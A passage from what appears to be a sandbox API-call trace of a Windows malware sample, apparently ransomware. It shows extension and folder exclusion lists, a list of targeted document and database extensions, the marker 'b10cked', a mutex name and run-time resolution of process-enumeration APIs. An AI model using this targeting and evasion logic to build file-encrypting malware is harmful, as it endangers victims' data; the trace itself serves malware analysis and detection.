lpString2="[ND_END]", cchCount2=8) returned 3 [0099.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JS", cchCount1=2, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NFO", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DMP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MUI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUN", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISW", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CAB", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EFI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSU", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BIN", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT_INFO", cchCount1=12, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT", cchCount1=7, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTM", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTML", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHM", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LANG", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="STYLE", cchCount1=5, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP3", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FLAC", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OGG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WMA", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GIF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JAVA", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CUR", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ANI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_END]", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[ND_START]", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINDOWS", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\PROGRAM FILES", cchCount1=14, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\GAMES", cchCount1=6, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\APPDATA\\", cchCount1=9, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\APPLICATION DATA\\", cchCount1=18, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\LOCAL SETTINGS\\", cchCount1=16, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TEMP\\", cchCount1=6, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\PROGRAMDATA\\", cchCount1=13, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\BOOT\\", cchCount1=6, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\MSOCACHE\\", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\DEFAULT USER\\", cchCount1=14, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\SAMPLE", cchCount1=7, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\EXAMPLE", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\I386", cchCount1=5, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TEMPORARY", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TOR BROWSER\\", cchCount1=13, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\BROWSER", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BROWSER\\", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[ND_END]", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 2 [0099.885] GetCurrentThreadId () returned 0xc18 [0099.885] GetCurrentThreadId () returned 0xc18 [0099.885] GetCurrentThreadId () returned 0xc18 [0099.885] FindResourceW (hModule=0x400000, lpName="PRL", lpType=0xa) returned 0x51c498 [0099.885] LoadResource (hModule=0x400000, hResInfo=0x51c498) returned 0x516f58 [0099.885] SizeofResource (hModule=0x400000, hResInfo=0x51c498) returned 0x61 [0099.885] LockResource (hResData=0x516f58) returned 0x516f58 [0099.885] FreeResource (hResData=0x516f58) returned 0 [0099.885] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0099.885] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0099.885] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0099.885] LockResource (hResData=0x50d64c) returned 0x50d64c [0099.885] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1521d70, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0099.885] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1521d70, cbMultiByte=38, lpWideCharStr=0x14fde4c, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0099.885] FreeResource (hResData=0x50d64c) returned 0 [0099.885] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0099.885] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x1521d74, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0099.885] GetCurrentThreadId () returned 0xc18 [0099.885] GetCurrentThreadId () returned 0xc18 [0099.885] GetCurrentThreadId () returned 0xc18 [0099.885] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x14bace8, cbMultiByte=97, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 97 [0099.885] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x14bace8, cbMultiByte=97, lpWideCharStr=0x14781ec, cchWideChar=97 | out: lpWideCharStr="1CD\r\nDT\r\nDBS\r\nDBF\r\nDBX\r\nMDB\r\nMDF\r\nSDF\r\nACCDB\r\nXLSX\r\nXLS\r\nDOCX\r\nDOC\r\nODS\r\nODT\r\nPDF\r\nJPG\r\nJPEG\r\nTXT") returned 97 [0099.886] CharLowerBuffW (in: lpsz="AST", cchLength=0x3 | out: lpsz="ast") returned 0x3 [0099.886] CharLowerBuffW (in: lpsz="AFN", cchLength=0x3 | out: lpsz="afn") returned 0x3 [0099.886] CharLowerBuffW (in: lpsz="ELST", cchLength=0x4 | out: lpsz="elst") returned 0x4 [0099.886] CharLowerBuffW (in: lpsz="EXE", cchLength=0x3 | out: lpsz="exe") returned 0x3 [0099.886] CharLowerBuffW (in: lpsz="LNK", cchLength=0x3 | out: lpsz="lnk") returned 0x3 [0099.886] CharLowerBuffW (in: lpsz="HTA", cchLength=0x3 | out: lpsz="hta") returned 0x3 [0099.886] CharLowerBuffW (in: lpsz="PEK", cchLength=0x3 | out: lpsz="pek") returned 0x3 [0099.886] CharLowerBuffW (in: lpsz="SEK", cchLength=0x3 | out: lpsz="sek") returned 0x3 [0099.886] CharLowerBuffW (in: lpsz="B10CKED", cchLength=0x7 | out: lpsz="b10cked") returned 0x7 [0099.886] CharLowerBuffW (in: lpsz="TMP", cchLength=0x3 | out: lpsz="tmp") returned 0x3 [0099.886] CharLowerBuffW (in: lpsz="ICO", cchLength=0x3 | out: lpsz="ico") returned 0x3 [0099.886] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Sypykbck.exe\" 1" [0099.886] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Sypykbck.exe\" 1" [0099.886] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Sypykbck.exe\" 1" [0099.886] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Sypykbck.exe\" 1" [0099.886] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Sypykbck.exe\" 1" [0099.886] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Sypykbck.exe\" 1" [0099.886] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Sypykbck.exe\" 1" [0099.886] OpenMutexW (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="35Brother1ProcessMutex6") returned 0x0 [0099.886] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="35Brother1ProcessMutex6") returned 0xb8 [0099.886] Sleep (dwMilliseconds=0x12c) [0100.296] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0100.296] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CreateToolhelp32Snapshot", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0100.296] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CreateToolhelp32Snapshot", cchWideChar=24, lpMultiByteStr=0x14ef63c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateToolhelp32Snapshot", lpUsedDefaultChar=0x0) returned 24 [0100.296] GetProcAddress (hModule=0x76910000, lpProcName="CreateToolhelp32Snapshot") returned 0x7694f731 [0100.296] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Heap32ListFirst", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0100.296] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Heap32ListFirst", cchWideChar=15, lpMultiByteStr=0x14d2d0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Heap32ListFirst", lpUsedDefaultChar=0x0) returned 15 [0100.296] GetProcAddress (hModule=0x76910000, lpProcName="Heap32ListFirst") returned 0x769a02e7 [0100.296] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Heap32ListNext", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0100.296] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Heap32ListNext", cchWideChar=14, lpMultiByteStr=0x14d2d0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Heap32ListNext", lpUsedDefaultChar=0x0) returned 14 [0100.296] GetProcAddress (hModule=0x76910000, lpProcName="Heap32ListNext") returned 0x769a0391 [0100.296] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Heap32First", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0100.296] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Heap32First", cchWideChar=11, lpMultiByteStr=0x14d2d0c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Heap32First", lpUsedDefaultChar=0x0) returned 11 [0100.297] GetProcAddress (hModule=0x76910000, lpProcName="Heap32First") returned 0x769a0429 [0100.297] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Heap32Next", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0100.297] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Heap32Next", cchWideChar=10, lpMultiByteStr=0x14d2d0c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Heap32Next", lpUsedDefaultChar=0x0) returned 10 [0100.297] GetProcAddress (hModule=0x76910000, lpProcName="Heap32Next") returned 0x769a0614 [0100.297] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Toolhelp32ReadProcessMemory", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0100.297] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Toolhelp32ReadProcessMemory", cchWideChar=27, lpMultiByteStr=0x14ef63c, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Toolhelp32ReadProcessMemory", lpUsedDefaultChar=0x0) returned 27 [0100.297] GetProcAddress (hModule=0x76910000, lpProcName="Toolhelp32ReadProcessMemory") returned 0x769a0819 [0100.297] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32First", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0100.297] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32First", cchWideChar=14, lpMultiByteStr=0x14d2d0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Process32First", lpUsedDefaultChar=0x0) returned 14 [0100.297] GetProcAddress (hModule=0x76910000, lpProcName="Process32First") returned 0x7697443d [0100.297] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32Next", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0100.297] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32Next", cchWideChar=13, lpMultiByteStr=0x14d2d0c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Process32Next", lpUsedDefaultChar=0x0) returned 13 [0100.297] GetProcAddress (hModule=0x76910000, lpProcName="Process32Next") returned 0x76974505 [0100.297] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32FirstW", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0100.297] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32FirstW", cchWideChar=15, lpMultiByteStr=0x14d2d0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Process32FirstW", lpUsedDefaultChar=0x0) returned 15 [0100.297] GetProcAddress (hModule=0x76910000, lpProcName="Process32FirstW") returned 0x7694fa35 [0100.297] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32NextW", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0100.297] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32NextW", cchWideChar=14, lpMultiByteStr=0x14d2d0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Process32NextW", lpUsedDefaultChar=0x0) returned 14 [0100.297] GetProcAddress (hModule=0x76910000, lpProcName="Process32NextW") returned 0x7694faca [0100.297] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32FirstW", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0100.297] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32FirstW", cchWideChar=15, lpMultiByteStr=0x14d2d0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Process32FirstW", lpUsedDefaultChar=0x0) returned 15 [0100.297] GetProcAddress (hModule=0x76910000, lpProcName="Process32FirstW") returned 0x7694fa35 [0100.297] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32NextW", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0100.297] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32NextW", cchWideChar=14, lpMultiByteStr=0x14d2d0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Process32NextW", lpUsedDefaultChar=0x0) returned 14 [0100.297] GetProcAddress (hModule=0x76910000, lpProcName="Process32NextW") returned 0x7694faca [0100.297] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Thread32First", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0100.298] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Thread32First", cchWideChar=13, lpMultiByteStr=0x14d2d0c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Thread32First", lpUsedDefaultChar=0x0) returned 13 [0100.298] GetProcAddress (hModule=0x76910000, lpProcName="Thread32First") returned 0x76977e4c [0100.298] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Thread32Next", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.298] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Thread32Next", cchWideChar=12, lpMultiByteStr=0x14d2d0c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Thread32Next", lpUsedDefaultChar=0x0) returned 12 [0100.298] GetProcAddress (hModule=0x76910000, lpProcName="Thread32Next") returned 0x76977edc [0100.298] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32First", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0100.298] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32First", cchWideChar=13, lpMultiByteStr=0x14d2d0c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Module32First", lpUsedDefaultChar=0x0) returned 13 [0100.298] GetProcAddress (hModule=0x76910000, lpProcName="Module32First") returned 0x769a0859 [0100.298] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32Next", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.298] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32Next", cchWideChar=12, lpMultiByteStr=0x14d2d0c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Module32Next", lpUsedDefaultChar=0x0) returned 12 [0100.298] GetProcAddress (hModule=0x76910000, lpProcName="Module32Next") returned 0x769a0942 [0100.298] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32FirstW", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0100.298] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32FirstW", cchWideChar=14, lpMultiByteStr=0x14d2d0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Module32FirstW", lpUsedDefaultChar=0x0) returned 14 [0100.298] GetProcAddress (hModule=0x76910000, lpProcName="Module32FirstW") returned 0x7694c59e [0100.298] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, 